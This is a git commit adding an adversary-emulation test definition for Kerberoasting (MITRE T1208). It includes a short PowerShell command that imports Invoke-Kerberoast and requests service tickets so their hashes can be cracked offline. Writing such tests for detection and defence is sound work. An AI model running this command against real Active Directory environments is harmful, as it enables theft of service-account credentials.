T1208 kerberoasting with invoke kerberoast (#548)
* Add test for T1208 that does Kerberoasting Kerberoasting with Invoke-Kerberoast * Rename atomics/T1208 to atomic/T1208/T1208.yaml * Rename atomic/T1208/T1208.yaml to atomics/T1208/T1208.yaml * Update T1208.yaml * Update T1208.yaml
This commit is contained in:
Jeff Ong
@@ -0,0 +1,22 @@
|
||||
---
|
||||
attack_technique: T1208
|
||||
display_name: Kerberoasting
|
||||
|
||||
atomic_tests:
|
||||
- name: Request for service tickets
|
||||
description: |
|
||||
This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
|
||||
|
||||
The following are further sources and credits for this attack:
|
||||
[Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
|
||||
[Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
|
||||
|
||||
supported_platforms:
|
||||
- windows
|
||||
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
command: |
|
||||
Import-Module .\Invoke-Kerberoast.ps1
|
||||
Invoke-Kerberoast | fl
|
||||
Reference in New Issue
Block a user